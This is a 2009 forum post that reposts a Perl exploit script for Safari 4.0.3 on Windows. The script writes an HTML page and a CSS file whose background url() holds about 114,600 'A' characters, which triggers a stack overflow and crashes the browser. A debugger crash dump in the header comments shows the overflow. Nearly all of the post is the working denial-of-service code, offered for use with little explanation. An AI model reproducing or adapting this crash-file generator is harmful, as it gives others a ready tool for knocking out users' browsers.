Government Security
Network Security Resources

Jump to content

Photo

Safari 4.0.3 (Win32) Css Remote Denial Of Service Exploit

security windows exploit perl denial of service
  • Please log in to reply
No replies to this topic

#1 qcred11

qcred11

    First Sergeant

  • Members
  • 2,544 posts

Posted 09 November 2009 - 11:38 PM


#!/usr/bin/perl

# ithinkthereforeiexist.pl

# AKA

# Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit

#

# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 11.09.2009

#

# *********************************************************************************************************

# Another remotely triggerable STACK_OVERFLOW in Safari on Windows...

#

# (204.72c): Stack overflow - code c00000fd (first chance)

# First chance exceptions are reported before any exception handling.

# This exception may be expected and handled.

# eax=000333d8 ebx=000fbd16 ecx=00000000 edx=037b3fd0 esi=037b3fd0 edi=0001bfad

# eip=00ae19af esp=00032ea8 ebp=00032f28 iopl=0         nv up ei pl nz na pe nc

# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Safari\CoreFoundation.dll - 

# CoreFoundation!_CFStringEncodeByteStream+0x2d:

# 00ae19af 8365b800        and     dword ptr [ebp-48h],0 ss:0023:00032ee0=00000000

#

# A product of Browser Fuzzer 3 <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/<#EMO_DIR#>/smile.gif' class='bbc_emoticon' alt=':)' />

#

# "We do it in the dark, with smiles on our faces"

#

# *********************************************************************************************************

# ithinkthereforeiexist.pl



$html = "ithinkthereforeiexist.html";

$css  = "ithinkthereforeiexist.css";



$size = 114600;



$htmldata = "<html>\n<head>\n<link rel=\"stylesheet\" href=\"" . $css . "\" />\n</head>\n";

$htmldata = $htmldata . "<body>\n<div id=\"die\">\n</div>\n</body>\n</html>";



$cssdata = "#die\n{\nbackground: url(" . "A" x $size . ");\n}";



     open(FD, '>' . $html);

     print FD $htmldata;

     close(FD);



     open(FD, '>' . $css);

     print FD $cssdata;

     close(FD);











Also tagged with one or more of these keywords: security, windows, exploit, perl, denial of service